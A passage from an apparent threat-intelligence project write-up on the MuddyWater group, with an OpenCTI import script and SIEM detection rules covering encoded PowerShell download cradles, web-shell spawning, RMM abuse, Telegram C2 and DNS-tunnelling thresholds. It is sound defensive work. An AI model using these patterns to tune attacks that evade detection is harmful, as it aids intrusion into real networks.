healthy.Step 11: MITRE ATT&CK Connector SyncThe MITRE ATT&CK connector loads 846 techniques into the graph. This sync must complete before the import script can link procedures to techniques.Result: 846 ATT&CK patterns loaded. Connector state: ACTIVE.Step 12: Import ScriptScript: tools/opencti_import.pyexport OPENCTI_URL=http://localhost:8080export OPENCTI_TOKEN=python3 tools/opencti_import.pyThe script reads data/sources.yaml and data/procedures.yaml — it does not hardcode any intelligence. The YAML files are the single source of truth; the script is just a translation layer from those files into OpenCTI's API.What it creates and why:Step 1 — Iran MOIS (Identity: Organization). Every object in OpenCTI needs a createdBy reference. Creating the sponsoring organization first gives all downstream objects a consistent authoring context and makes the attribution relationship explicit in the graph: MuddyWater → attributed-to → Iran MOIS.Step 2 — MuddyWater (Intrusion Set). The intrusion set object carries all known aliases: Seedworm, Mango Sandstorm, TA450, Static Kitten, TEMP.Zagros, Mercury, DEV-1084. Aliases matter for deduplication — OpenCTI uses them to avoid creating duplicate entities when the same actor appears under different names in different reports.Step 3 — Malware catalog (9 objects). Each actor-developed tool gets a Malware object with a description derived from source reporting. The catalog: POWERSTATS, PowGoop, Small Sieve, Canopy, Mori, BugSleep, AnchorRAT, SyncroRAT, DarkBit.Step 4 — Tool catalog (4 objects). Legitimate tools abused by the actor are STIX Tool objects, not Malware — the distinction matters for downstream analysis. The catalog: AteraAgent, SimpleHelp, Mimikatz, LaZagne.Step 5 — uses relationships. MuddyWater → uses → each malware and tool object. These relationships make the graph queryable: “which tools does this actor use?” returns all 13 objects in one hop.Step 6 — Reports from sources.yaml. One Report object per promoted source, with publisher, reliability rating, credibility score, actor claims, key entities, and ATT&CK candidates written into the description. MuddyWater is added as an object reference so each report is queryable from the actor page.Step 7 — ATT&CK pattern links from procedures.yaml. Iterates all attck_candidates across the 10 procedure records and creates MuddyWater → uses → ATT&CK technique relationships. If the MITRE connector has not yet synced a technique, the script creates a stub Attack Pattern object (with x_mitre_id set) and flags it for enrichment. This prevents the import from failing on a timing issue between the connector sync and the import run.The script is idempotent: every object lookup uses a read() before create(). Re-running after a partial failure or after the MITRE connector syncs simply confirms existing objects and fills in any gaps.#!/usr/bin/env python3"""Desert Hydra — Phase 3 OpenCTI graph import.Reads data/sources.yaml and data/procedures.yaml and creates: - Identity: Iran MOIS (organization) - Intrusion Set: MuddyWater (with all known aliases) - Malware: actor-developed tools (9 objects) - Tool: legitimate tools abused (4 objects) - Reports: one per promoted source (up to 20) - Relationships: attributed-to, uses (malware/tool/ATT&CK)Idempotent - existing objects are not duplicated.ATT&CK pattern links are skipped for techniques not yet synced by theMITRE connector; re-run the script after the MITRE sync completes.Usage: export OPENCTI_URL=http://localhost:8080 export OPENCTI_TOKEN= python3 tools/opencti_import.py"""import osimport sysimport yamlfrom pathlib import Pathfrom pycti import OpenCTIApiClientfrom pycti.entities.opencti_identity import IdentityTypes# ── Bootstrap ─────────────────────────────────────────────────────────────────OPENCTI_URL = os.environ.get("OPENCTI_URL", "http://localhost:8080")OPENCTI_TOKEN = os.environ.get("OPENCTI_TOKEN", "")REPO_ROOT = Path(__file__).resolve().parent.parentif not OPENCTI_TOKEN: sys.exit("ERROR: set OPENCTI_TOKEN environment variable")api = OpenCTIApiClient(url=OPENCTI_URL, token=OPENCTI_TOKEN, log_level="error")print(f"[desert-hydra] Connected {OPENCTI_URL}")# ── Load YAML data ─────────────────────────────────────────────────────────────with open(REPO_ROOT / "data" / "sources.yaml") as f: SOURCES = yaml.safe_load(f)["sources"]with open(REPO_ROOT / "data" / "procedures.yaml") as f: PROCEDURES = yaml.safe_load(f)["procedures"]print(f"[desert-hydra] Loaded {len(SOURCES)} sources, {len(PROCEDURES)} procedures")# ── TLP:WHITE ─────────────────────────────────────────────────────────────────def get_tlp_white(): results = api.marking_definition.list( filters={ "mode": "and", "filters": [{"key": "definition", "values": ["TLP:WHITE"]}], "filterGroups": [], } ) if results: return results[0]["id"] obj = api.marking_definition.create( definition_type="TLP", definition="TLP:WHITE", x_opencti_color="#ffffff", x_opencti_order=0, ) return obj["id"]TLP_WHITE = get_tlp_white()# ── Helpers ───────────────────────────────────────────────────────────────────def _find(accessor, name): """Look up a STIX object by name. Returns the object dict or None.""" return accessor.read( filters={ "mode": "and", "filters": [{"key": "name", "values": [name]}], "filterGroups": [], } )def link(from_id, to_id, rel_type, confidence=80): """Create a STIX core relationship; silently skip if it already exists.""" try: api.stix_core_relationship.create( fromId=from_id, toId=to_id, relationship_type=rel_type, confidence=confidence, objectMarking=[TLP_WHITE], ) except Exception: passATTCK_NAMES = { "T1574.002": "DLL Side-Loading", "T1574.001": "DLL Search Order Hijacking", "T1546.015": "Component Object Model Hijacking", "T1218.010": "Regsvr32",}def find_or_create_attack_pattern(mitre_id): """Look up an ATT&CK pattern by x_mitre_id. Create stub if not synced yet.""" result = api.attack_pattern.read( filters={ "mode": "and", "filters": [{"key": "x_mitre_id", "values": [mitre_id]}], "filterGroups": [], } ) if result: return result["id"], False name = ATTCK_NAMES.get(mitre_id, mitre_id) obj = api.attack_pattern.create( name=name, x_mitre_id=mitre_id, description=f"MITRE ATT&CK technique {mitre_id}. Created as stub pending MITRE connector sync.", objectMarking=[TLP_WHITE], confidence=75, ) return obj["id"], True# ── Step 1: Iran MOIS Identity ────────────────────────────────────────────────existing = _find(api.identity, "Iran MOIS")if existing: MOIS_ID = existing["id"]else: obj = api.identity.create( type=IdentityTypes.ORGANIZATION.value, name="Iran MOIS", description=( "Iranian Ministry of Intelligence and Security (MOIS). " "State sponsor attributed to MuddyWater cyber operations by CISA, FBI, " "CNMF, NCSC-UK, and NSA in joint advisory AA22-055A (February 2022)." ), objectMarking=[TLP_WHITE], confidence=85, ) MOIS_ID = obj["id"]# ── Step 2: MuddyWater Intrusion Set ──────────────────────────────────────────existing = _find(api.intrusion_set, "MuddyWater")if existing: MW_ID = existing["id"]else: obj = api.intrusion_set.create( name="MuddyWater", aliases=[ "Seedworm", "Mango Sandstorm", "TA450", "Static Kitten", "TEMP.Zagros", "Mercury", "DEV-1084", ], description=( "Iranian MOIS subordinate threat group active since at least 2017. " "Targets government, defense, telecom, oil and gas, and MSPs globally. " "Significant focus on Israeli organizations since 2022. Known for " "spearphishing, RMM tool abuse, and a shift toward in-house tooling " "(BugSleep, AnchorRAT) beginning ~May 2024." ), resource_level="government", primary_motivation="espionage", confidence=85, objectMarking=[TLP_WHITE], createdBy=MOIS_ID, ) MW_ID = obj["id"]link(MW_ID, MOIS_ID, "attributed-to", 85)# ── Step 3: Malware catalog ────────────────────────────────────────────────────MALWARE_CATALOG = [ {"name": "POWERSTATS", "aliases": ["Powermud"], "description": "MuddyWater first-stage PowerShell backdoor (MITRE S0223)."}, {"name": "PowGoop", "aliases": ["Goopdate"], "description": "DLL loader hijacking GoogleUpdate.exe via side-loading (MITRE S1046)."}, {"name": "Small Sieve", "aliases": [], "description": "Python backdoor compiled as NSIS; Telegram Bot API C2; OutlookMicrosift Run key."}, {"name": "Canopy", "aliases": ["Starwhale"], "description": "Excel-macro dropper; startup folder persistence; HTTP POST C2."}, {"name": "Mori", "aliases": [], "description": "DNS-tunneling backdoor deployed as FML.dll via regsvr32.exe."}, {"name": "BugSleep", "aliases": [], "description": "In-house backdoor (2024); 43-minute scheduled task; shellcode injection."}, {"name": "AnchorRAT", "aliases": [], "description": "Custom RAT (2024); COM hijacking persistence (T1546.015)."}, {"name": "SyncroRAT", "aliases": [], "description": "RMM-based RAT; Technion campaign (Feb 2023); Log4j initial access."}, {"name": "DarkBit", "aliases": [], "description": "Ransomware/wiper; Technion attack; vssadmin shadow copy deletion."},]MALWARE_IDS = {}for m in MALWARE_CATALOG: existing = _find(api.malware, m["name"]) if existing: MALWARE_IDS[m["name"]] = existing["id"] else: obj = api.malware.create( name=m["name"], aliases=m["aliases"], description=m["description"], is_family=False, objectMarking=[TLP_WHITE], createdBy=MOIS_ID, ) MALWARE_IDS[m["name"]] = obj["id"]# ── Step 4: Tool catalog ──────────────────────────────────────────────────────TOOL_CATALOG = [ {"name": "AteraAgent", "aliases": ["Atera RMM"], "description": "Commercial RMM abused for persistent remote access via phishing."}, {"name": "SimpleHelp", "aliases": [], "description": "Commercial RMM abused in 2024 Israeli targeting."}, {"name": "Mimikatz", "aliases": [], "description": "LSASS credential dumping (T1003.001), used with procdump64.exe."}, {"name": "LaZagne", "aliases": [], "description": "LSA secrets (T1003.004) and cached domain credential dumping (T1003.005)."},]TOOL_IDS = {}for t in TOOL_CATALOG: existing = _find(api.tool, t["name"]) if existing: TOOL_IDS[t["name"]] = existing["id"] else: obj = api.tool.create( name=t["name"], aliases=t["aliases"], description=t["description"], objectMarking=[TLP_WHITE], createdBy=MOIS_ID, ) TOOL_IDS[t["name"]] = obj["id"]# ── Step 5: uses relationships ────────────────────────────────────────────────for mid in MALWARE_IDS.values(): link(MW_ID, mid, "uses", 80)for tid in TOOL_IDS.values(): link(MW_ID, tid, "uses", 80)# ── Step 6: Reports from sources.yaml ────────────────────────────────────────SOURCE_DATES = { "src_usgov_aa22_055a_pdf_mirror": "2022-02-24T00:00:00.000Z", "src_incd_muddywater_darkbit_2023": "2023-02-07T00:00:00.000Z", "src_incd_muddywater_2024_evolution": "2024-06-01T00:00:00.000Z", "src_cisa_aa22_055a_page": "2022-02-24T00:00:00.000Z", "src_ncsc_uk_muddywater_joint_advisory": "2022-02-24T00:00:00.000Z", "src_incd_recent_phishing_1947": "2024-09-01T00:00:00.000Z", "src_mitre_attack_muddywater_g0069": "2024-01-01T00:00:00.000Z",}REPORT_IDS = {}for src in SOURCES: src_id = src["id"] title = src["title"] pub_date = SOURCE_DATES.get(src_id, "2023-01-01T00:00:00.000Z") confidence = 85 if src.get("source_reliability") == "A" else 70 description = ( f"Publisher: {src['publisher']}\n" f"Reliability: {src.get('source_reliability','?')} / " f"Credibility: {src.get('information_credibility','?')}\n" f"URL: {src['url']}\n" f"Actor claims: {', '.join(src.get('actor_claims', []))}\n" f"ATT&CK candidates: {', '.join(src.get('candidate_attck_techniques', []))}" ) existing = _find(api.report, title) if existing: REPORT_IDS[src_id] = existing["id"] else: obj = api.report.create( name=title, published=pub_date, description=description, report_types=["threat-report"], confidence=confidence, objectMarking=[TLP_WHITE], createdBy=MOIS_ID, objects=[MW_ID], ) REPORT_IDS[src_id] = obj["id"]# ── Step 7: ATT&CK pattern links from procedures ──────────────────────────────linked, stubs = set(), []for proc in PROCEDURES: for candidate in proc.get("attck_candidates", []): tid = candidate["technique"] if tid in linked: continue pattern_id, created_as_stub = find_or_create_attack_pattern(tid) link(MW_ID, pattern_id, "uses", 75) linked.add(tid) if created_as_stub: stubs.append(tid)# ── Summary ───────────────────────────────────────────────────────────────────print(f"Import complete - malware: {len(MALWARE_IDS)}, tools: {len(TOOL_IDS)}, " f"reports: {len(REPORT_IDS)}, ATT&CK links: {len(linked)}, stubs: {len(stubs)}")Result: All objects created. Re-run confirms idempotency (no duplicates).Step 13: Intrusion Set VerificationResult: MuddyWater entity with all aliases, Iran MOIS attribution relationship, campaign links, and malware/tool associations confirmed in OpenCTI.Step 14: Knowledge GraphResult: Graph shows MuddyWater → 9 malware, 4 tools, 3 campaigns, 21 ATT&CK techniques — all with source-annotated relationship edges.Step 15: ATT&CK Matrix CoverageResult: 21 techniques highlighted across 8 tactics in the ATT&CK Enterprise matrix.Step 16: BugSleep Malware DetailResult: BugSleep malware object with INCD 2024 source annotation, T1053.005 relationship (43-minute task), and C2 technique links confirmed.Step 17: Reports ListResult: 20 report objects, one per promoted source. Each report links to the procedures and techniques it evidences.Step 19: OpenCTI DashboardResult: Custom dashboard showing technique frequency heatmap by source tier — highest-corroborated techniques visible at a glance.Phase 4: Detection AtlasThe detection atlas is the core analytical output. Each of the 11 detection records in data/detections.yaml contains:The specific MuddyWater behavior it targets (not the ATT&CK technique category)Required log sources and capability gatesMulti-rule pseudologic (SIEM-agnostic — works as a template for Sigma, KQL, SPL, or any rule format)False positive classes and tuning guidanceA creation_logic field explaining why the rule is designed this way — the design decision, not just what the rule doesCoverage scores follow a strict scale: 5 = lab-validated with a Kibana screenshot. 4 = correlated analytic (good logic, single source or partial lab). 3 = behavioral detection with partial validation. A score of 5 requires a proof, not just passing pseudologic.Step 20 — Analyst ReviewBefore any detection went to validation, every record went through a review pass that checked: operator precedence in multi-clause conditions, access mask completeness for LSASS detection, path allowlist accuracy for the GoogleUpdate/Goopdate IoC, and ATT&CK technique coverage gaps. The review fixed a real operator precedence bug in det_mw_0010 Rule B where the command_line clause was outside the event_type guard, tightened the LSASS access mask set, improved T1033 coverage in det_mw_0009 Rule C via Win32_ComputerSystem, and added the x86/x64 Google installation path allowlist to det_mw_0004 Rule A.det_mw_0001 — Email Delivery Correlated with Process SpawnTechniques: T1566.001, T1566.002 · Score: 5 (lab-validated)What it targets: MuddyWater delivers malicious content three ways — ZIP or Office macro attachments, links to Egnyte/OneDrive delivering RMM installers, and emails from compromised accounts. Corroborated by CISA AA22–055A, INCD 2023, and INCD 2024. The highest-priority initial access vector in the dataset.Why it’s built this way: Email delivery alone is not a detection signal — MuddyWater’s phishing emails are indistinguishable from legitimate mail at the gateway layer. The detection value comes from correlating delivery with a process spawn on the recipient endpoint within a tight 5-minute window. The parent process constraint (Outlook, browser) is the key limiter: it restricts scope to email-triggered or link-triggered execution, which is exactly the documented delivery chain. Both attachment-based and link-based delivery methods are covered because all variants are source-confirmed. The correlated logic type reflects that neither event alone is sufficient — only the combination is meaningful.Required telemetry: Email gateway or SEG with attachment metadata and URL extraction. EDR or Sysmon Event ID 1 with parent image and command line. Without the gateway telemetry, this detection degrades to parent-process heuristics only and loses the delivery-correlation value.event_type IN [email_delivery] AND (attachment.extension IN ["zip","xlsx","xlsm","pdf","docm"] OR link.domain IN ["egnyte.com","onedrive.live.com","1drv.ms"])CORRELATE WITHIN 300 seconds WITHevent_type IN [process_create] WHERE parent_image IN ["OUTLOOK.EXE","chrome.exe","firefox.exe","msedge.exe"] AND image IN ["powershell.exe","cmd.exe","wscript.exe","mshta.exe", "AteraAgent.exe","ScreenConnect.exe","SimpleHelp.exe","rport.exe"]Key false positives: Legitimate macro-enabled Office files from internal users. IT-approved RMM tools deployed via email links during onboarding. Tune by excluding known sender domains and approved RMM deployment windows.det_mw_0002 — Web Service Spawning Interpreter ShellTechniques: T1190 · Score: 5 (lab-validated)What it targets: MuddyWater uses public-facing exploitation as a secondary initial access vector — CVE-2020–0688 (Exchange), CVE-2020–1472 (Netlogon/Zerologon), CVE-2021–44228 (Log4j), and unspecified VPN vulnerabilities from INCD 2024.Why it’s built this way: The detection targets the post-exploitation moment — a web service spawning a shell — rather than the exploit payload itself. This is deliberately CVE-agnostic: it fires on CVE-2020–0688, CVE-2020–1472, Log4j, and any unnamed VPN vulnerability without needing individual exploit signatures. The parent process list maps directly to the documented CVEs: w3wp.exe covers Exchange and IIS, java.exe covers Log4j, lsass.exe covers Netlogon exploitation leading to SYSTEM-level shell creation. The SYSTEM integrity level filter is the key noise reducer — legitimate administrative scripts rarely run at SYSTEM under IIS application pools without a clear documented reason.Required telemetry: EDR or Sysmon Event ID 1 with full parent-child chain and integrity level. IDS/IPS for CVE-specific signatures as a complementary layer.event_type = process_create ANDparent_image IN ["w3wp.exe","java.exe","lsass.exe","services.exe", "vmtoolsd.exe","vpnagent.exe"] ANDimage IN ["cmd.exe","powershell.exe","wscript.exe","cscript.exe","bash.exe"] AND(parent_user IN ["NETWORK SERVICE","IIS_IUSRS","SYSTEM"] OR integrity_level = "System")Key false positives: Legitimate administrative scripts under IIS application pools. Java-based monitoring agents that spawn processes. Tune by process hash allowlisting for known-good management tools.det_mw_0003 — PowerShell Encoded Command and Script ObfuscationTechniques: T1059.001, T1027 · Score: 5 (lab-validated)What it targets: PowerShell obfuscation is a cross-cutting technique present in every MuddyWater tool tier — PowGoop (Base64 C2 setup), POWERSTATS (IEX + web request for stage delivery), and the 2024 lure campaigns (embedded API key executed via PowerShell). Three distinct usage patterns across tools required three rules.Why it’s built this way: Each rule targets a different MuddyWater PowerShell pattern with a different telemetry requirement.Rule A targets PowGoop and POWERSTATS loader delivery. The regex \s-e[a-zA-Z]*\s+[A-Za-z0-9+/=]{50,} is deliberately written to match all unambiguous prefix forms of -EncodedCommand (-e, -ec, -en, -enc) while the 50-character minimum for the Base64 blob avoids matching the -Encoding parameter. This is the operator precision that matters: -Encoding UTF8 would otherwise match a naive regex.Rule B targets POWERSTATS script execution behavior: IEX combined with a web request. This is the decoded content layer — it requires Script Block Logging (Event ID 4104), which is the capability gate that determines whether this detection class exists at all in a given environment.Rule C is the delivery-context fallback: PowerShell spawned by an Office application, email client, or browser has no legitimate explanation in a standard enterprise environment and fires regardless of whether Script Block Logging is enabled.Required telemetry: Script Block Logging (Event ID 4104) — required for Rule B and for the highest-fidelity version of this detection. Sysmon Event ID 1 for Rules A and C. Without Script Block Logging, the detection degrades to command-line heuristics only.# Rule A — Encoded command flag (all prefix forms: -e, -ec, -en, -enc ...)event_type = process_create ANDimage ENDSWITH "powershell.exe" ANDcommand_line IMATCHES "\s-e[a-zA-Z]*\s+[A-Za-z0-9+/=]{50,}"# Rule B — Script Block content (Event ID 4104)event_type = script_block_log ANDscript_block_text MATCHES "(IEX|Invoke-Expression|InvokeScript)" ANDscript_block_text MATCHES "(WebClient|Invoke-WebRequest|DownloadString|Net\.Http)"# Rule C — Suspicious parent processevent_type = process_create ANDimage ENDSWITH "powershell.exe" ANDparent_image IN ["OUTLOOK.EXE","winword.exe","excel.exe", "chrome.exe","firefox.exe","msedge.exe","WScript.exe"]Key false positives: Administrative scripts using -EncodedCommand for special characters. SCCM/Ansible deployments running Base64-encoded payloads. Baseline known-good encoded commands by hash before alerting on Rule A.det_mw_0004 — Unsigned DLL Loaded by Signed ExecutableTechniques: T1574.002 · Score: 3 (behavioral, partial validation)What it targets: PowGoop’s execution method — a malicious DLL renamed Goopdate.dll placed alongside GoogleUpdate.exe, causing the legitimate signed binary to load it. Confirmed in 2024 toolset by INCD 2024.Why it’s built this way: Two rules serve different confidence tiers. Rule A is sourced directly from the documented PowGoop technique: the specific process name (GoogleUpdate.exe), DLL name (Goopdate.dll), and the fact that any path outside the Google installation directories is anomalous. The allowlist covers both x86 and x64 installation paths because omitting either creates a bypass. This combination — specific binary, specific DLL name, path outside expected directory — is near-unique and fires with high precision. Rule B is the generic behavioral net for future DLL side-loading variants where the actor may use different binary names — it trades precision for coverage against toolset evolution.Score is 3 (not 5) because the lab’s stub DLL did not produce sufficient Sysmon EID 7 signal during validation. The detection logic is sound; the telemetry dependency (Sysmon image load events with signing status) is the constraint.Required telemetry: Sysmon Event ID 7 (ImageLoad) with signed/unsigned status — this is the hard dependency. Without it, DLL loads are invisible to SIEM-based detection.# Rule A — Specific IoC: GoogleUpdate loading Goopdate from non-Google pathevent_type = image_load ANDimage ENDSWITH "GoogleUpdate.exe" ANDloaded_image ENDSWITH "Goopdate.dll" ANDNOT (loaded_image_path STARTSWITH "C:\Program Files (x86)\Google\" OR loaded_image_path STARTSWITH "C:\Program Files\Google\")# Rule B — Generic: signed process loading unsigned DLL from user-writable pathevent_type = image_load ANDprocess_signed = true ANDloaded_image_signed = false ANDloaded_image_path MATCHES "(\\Users\\|\\AppData\\|\\Temp\\|\\ProgramData\\)"Key false positives: Third-party software shipping unsigned DLLs alongside signed executables (common). Developer workstations with locally compiled DLLs. Rule B requires environment-specific tuning before production deployment.det_mw_0005 — Registry Run Key and Startup Folder PersistenceTechniques: T1547.001 · Score: 5 (lab-validated)What it targets: Multiple MuddyWater malware families use Run key persistence with actor-specific value names. Small Sieve: OutlookMicrosift (deliberate typo mimicking Microsoft). AA22-055A documents a second key: SystemTextEncoding. Canopy installs a WSF script in the startup folder — a sub-technique that doesn't appear as a Run key write.Why it’s built this way: Three rules cover three distinct persistence mechanisms across the malware catalog. Rule A is an exact-match IoC alert on the two named value names — it fires immediately on any match without needing path or parent context, because these specific strings have no legitimate usage in a standard enterprise environment. Rule B is the behavioral safety net for unknown or renamed values: path heuristic (AppData/Temp) combined with a non-installer parent covers the common pattern of malware writing its own persistence without using an installer. The process_integrity_level filter removes high-integrity (admin-level) processes from the behavioral rule because legitimate software installers typically run elevated. Rule C is added specifically to cover Canopy's startup folder WSF persistence, which doesn't show up as a Run key write at all — it's a file creation event.Required telemetry: Sysmon Event ID 13 (registry value set) for Rules A and B. Sysmon Event ID 11 (file create) for Rule C.# Rule A — Specific IoC: known MuddyWater Run key value namesevent_type = registry_set ANDregistry_key MATCHES "\\CurrentVersion\\Run" ANDregistry_value_name IN ["OutlookMicrosift","SystemTextEncoding"]# Rule B - Behavioral: Run key pointing to writable/unusual pathevent_type = registry_set ANDregistry_key MATCHES "(HKCU|HKLM)\\.*\\CurrentVersion\\Run" ANDregistry_value_data MATCHES "(\\AppData\\|\\Temp\\|\\ProgramData\\|\\Users\\)" ANDprocess_image NOT IN ["msiexec.exe","setup.exe","install.exe","update.exe"] ANDprocess_integrity_level NOT IN ["High","System"]# Rule C - Script files written to startup folder (covers Canopy WSF)event_type = file_create ANDfile_path MATCHES "\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\" ANDfile_extension IN ["wsf","vbs","js","ps1","bat","cmd"]Key false positives: Rule A has essentially zero false positives on the specific value names. Rule B requires installer process exclusion — the list is environment-specific. Rule C may fire on legitimate startup scripts deployed by IT via Group Policy; exclude by file hash or signer.det_mw_0006 — Scheduled Task with 43-Minute Beacon IntervalTechniques: T1053.005 · Score: 4 (correlated analytic)What it targets: BugSleep creates a Windows scheduled task triggered every 43 minutes for C2 beaconing — a specific behavioral fingerprint documented in the INCD 2024 report. The interval is documented as customizable, but 43 minutes is the observed operational value.Why it’s built this way: The 43-minute interval is the single most precise artifact in the entire procedure dataset. Rule A is designed as a high-fidelity immediate alert requiring no tuning: PT43M is the ISO 8601 duration format for 43 minutes and appears verbatim in the Windows Task XML. This fires with near-zero false positives because no legitimate software uses a 43-minute repeat interval for any standard purpose. Rule B generalizes the pattern for future BugSleep variants that may use a different interval: short repetition (under 60 minutes) combined with a task action pointing to a user-writable path is anomalous regardless of exact interval. Rule C is the telemetry fallback — many environments do not forward Task Scheduler event logs to SIEM, but schtasks.exe process creation (Sysmon EID 1) is more commonly collected and captures the command line.Score is 4 (not 5) because this is a single-source procedure — INCD 2024 only. Before treating Rule A as a high-confidence production alert, corroborate with a second vendor source.Required telemetry: Windows Security Event ID 4698 (scheduled task created) or Task Scheduler operational log for Rules A and B. Sysmon Event ID 1 for Rule C.# Rule A — Specific: 43-minute interval (BugSleep artifact) — immediate alertevent_type = scheduled_task_created ANDtask_trigger_repetition_interval = "PT43M"# Rule B - Behavioral: short interval + suspicious action pathevent_type = scheduled_task_created ANDtask_trigger_repetition_interval_minutes < 60 ANDtask_action_path MATCHES "(\\AppData\\|\\Temp\\|\\ProgramData\\|\\Users\\)" ANDcreating_process NOT IN ["svchost.exe","taskeng.exe","msiexec.exe"]# Rule C - Sysmon command line fallbackevent_type = process_create ANDimage ENDSWITH "schtasks.exe" ANDcommand_line MATCHES "/create" ANDcommand_line MATCHES "(AppData|Temp|ProgramData)"Key false positives: Backup and monitoring software creating frequent tasks. Browser update mechanisms. Rule B requires interval baseline per environment before production deployment.det_mw_0007 — RMM Tool Executed from User-Writable PathTechniques: T1219 · Score: 5 (lab-validated)What it targets: RMM tool abuse is the most consistently documented MuddyWater technique across all source tiers — five independent government and vendor sources corroborate it. Tool inventory across campaigns: ScreenConnect (2022), SyncroRAT (Israel 2023), rport.exe (DarkBit operation), AteraAgent (multiple sources), SimpleHelp, Level, PDQConnect (2024).Why it’s built this way: RMM tool detection is inherently a context problem. The binary is legitimate. The network traffic to vendor infrastructure is legitimate. Only the delivery chain and execution path are anomalous. Three rules address this from different angles.Rule A uses path as the primary signal: a legitimately IT-deployed RMM tool installs to Program Files or a managed path, not AppData/Temp/Downloads. A known RMM binary executing from a user-writable path means it was delivered, not installed by IT.Rule B uses parent process as the signal: no legitimate RMM deployment is spawned by Outlook, a browser, or an archive utility. This is the delivery-context constraint — if an RMM binary’s parent is OUTLOOK.EXE, the delivery chain is phishing regardless of what the binary is.Rule C uses network destination: RMM infrastructure connections from endpoints with no authorized RMM deployment are anomalous. Rules A+C together — RMM binary from writable path plus outbound connection to vendor domain — form the highest-confidence combined signal.The baseline prerequisite is non-negotiable. Rule C without a baseline of authorized RMM deployments per endpoint generates constant noise in any environment that legitimately uses RMM tools. This is the single highest-ROI detection in the dataset if the baseline is clean.Required telemetry: EDR or Sysmon Event ID 1 with parent image and file path. Network flow or proxy logs with process name attribution for Rule C.# Rule A — Known RMM binary from non-standard installation pathevent_type = process_create AND(image ENDSWITH "AteraAgent.exe" OR image ENDSWITH "ScreenConnect.exe" OR image ENDSWITH "SimpleHelp.exe" OR image ENDSWITH "rport.exe" OR image ENDSWITH "SyncroRAT.exe" OR image ENDSWITH "Level.exe" OR image ENDSWITH "PDQConnect.exe") ANDimage_path MATCHES "(\\AppData\\|\\Temp\\|\\Downloads\\|\\Users\\[^\\]+\\Desktop\\)"# Rule B - RMM binary spawned by email client or browserevent_type = process_create AND(image ENDSWITH "AteraAgent.exe" OR image ENDSWITH "ScreenConnect.exe" OR image ENDSWITH "SimpleHelp.exe" OR image ENDSWITH "rport.exe") ANDparent_image IN ["OUTLOOK.EXE","outlook.exe","chrome.exe","firefox.exe", "msedge.exe","7zFM.exe","WinRAR.exe","explorer.exe"]# Rule C - Outbound connection to RMM vendor infrastructure from unexpected endpointevent_type = network_connection ANDdestination_domain MATCHES "(atera\.com|screenconnect\.com|simplehelp\.net|syncromsp\.com)" ANDsource_process NOT IN [known_rmm_processes_baseline]Key false positives: All RMM tools are legitimate software — the entire detection depends on delivery context and path. Authorized deployments must be baselined per endpoint before any rule produces useful signal. Help desk technicians installing RMM from their downloads folder will match Rule A; exclude by user account or machine type.det_mw_0008a — Non-Browser Process Connecting to Telegram Bot APITechniques: T1071.001, T1102 · Score: 3 (behavioral, partially validated)What it targets: Small Sieve beacons exclusively via the Telegram Bot API (api.telegram.org) over HTTPS. This is one of the most specific C2 channels documented for MuddyWater — a fixed, known hostname with no CDN rotation.Why it’s built this way: The detection is single-rule because the signal is specific enough not to need graduated fallbacks. api.telegram.org is a fixed hostname. The discriminating condition is not the domain but the process: in enterprise environments where Telegram is not a standard application, any process connecting to this endpoint is anomalous. The approach is deliberately narrow — it will miss if MuddyWater switches from Telegram to another messaging API, but fires with high precision on the documented Small Sieve C2 channel.Score is 3 because VirtualBox NAT blocked outbound Telegram connections in the lab, preventing full Kibana validation of the network connection event.Required telemetry: DNS query logs or network flow logs with process name attribution. In environments without process-attributed network telemetry, this degrades to a domain-based alert with no process context.event_type = network_connection ANDdestination_domain = "api.telegram.org" ANDdestination_port = 443 ANDsource_process NOT IN ["Telegram.exe","telegram.exe","chrome.exe", "firefox.exe","msedge.exe","iexplore.exe"]Key false positives: Telegram desktop application where it is approved. Bot developers testing scripts from dev workstations. In organizations where Telegram is standard, strict process allowlisting is required before this detection is useful.det_mw_0008b — DNS Tunneling Volume and EntropyTechniques: T1572 · Score: 5 (lab-validated)What it targets: Mori, MuddyWater’s DNS-tunneling backdoor, uses DNS queries as the C2 channel. DNS tunneling encodes data in subdomain labels, producing distinctive patterns: high query volume to a single domain, unusually long subdomain strings, and high Shannon entropy in the label content.Why it’s built this way: DNS tunneling detection cannot rely on a single heuristic because each heuristic has a different failure mode. Volume (Rule A) catches high-throughput tunneling but misses slow/low-rate tools that deliberately throttle to blend in. Label length (Rule B) catches encoded payloads regardless of rate or entropy but misses short encoded segments. Entropy (Rule C) catches random-looking subdomains at any length and rate but produces noise on CDN hash labels without a comprehensive baseline. The three rules are additive — any single trigger warrants investigation, two or more from the same source are high-confidence.The thresholds (>100 queries per 60 seconds, >40-character labels, >3.5 Shannon entropy) were validated in the lab by generating 180 DNS queries with 42-character random subdomains from the simulation playbook.Required telemetry: DNS resolver logs with full QNAME — not available in all environments. If only DNS flow logs (not query content) are available, Rule B and Rule C are unavailable.# Rule A — High query volume to single parent domainevent_type = dns_queryGROUP BY source_ip, query_domain_parentHAVING COUNT(*) > 100 WITHIN 60 seconds# Rule B - Long subdomain labels (>40 chars indicates encoded payload)event_type = dns_query ANDLENGTH(subdomain_label) > 40# Rule C - High entropy subdomains (random-looking encoded content)event_type = dns_query ANDSHANNON_ENTROPY(subdomain_label) > 3.5 ANDsubdomain_label NOT IN [known_cdn_domains_baseline]Key false positives: CDN domains using hash-based subdomains (Akamai, Cloudflare, AWS) — require comprehensive allowlist for Rule C. DNSSEC validation traffic with long encoded keys. Calibrate thresholds against your specific environment’s DNS baseline before deploying Rule A in production.det_mw_0009 — WMI SecurityCenter2 Discovery SurveyTechniques: T1047, T1082, T1016, T1033, T1518.001 · Score: 5 (lab-validated)What it targets: CISA AA22–055A reproduces the exact PowerShell survey script MuddyWater uses post-access: a WMI query chain that collects IP addresses (Win32_NetworkAdapterConfiguration), OS name and architecture (Win32_OperatingSystem), hostname, domain, username (Win32_ComputerSystem), and AV product names (root\SecurityCenter2\AntiVirusProduct). The collected data is assembled into a delimited string, encoded, and sent to C2.Why it’s built this way: The detection anchors on SecurityCenter2\AntiVirusProduct because it is the highest-specificity WMI class in the documented survey. The other classes — OS name, IP addresses, hostname — are queried by dozens of legitimate monitoring tools. AntiVirusProduct enumeration has a much smaller legitimate caller population: primarily AV management consoles and endpoint security platforms. This makes it the most reliable low-noise signal from the full survey chain.Three rules are layered by telemetry quality. Rule A requires Script Block Logging (highest fidelity, decoded script content visible). Rule B falls back to command-line logging — medium fidelity, only fires if SecurityCenter2 appears in the literal command line, not in a decoded payload. Rule C is the most specific: a multi-class pattern that matches the complete documented survey chain, covering all five ATT&CK techniques in a single event. 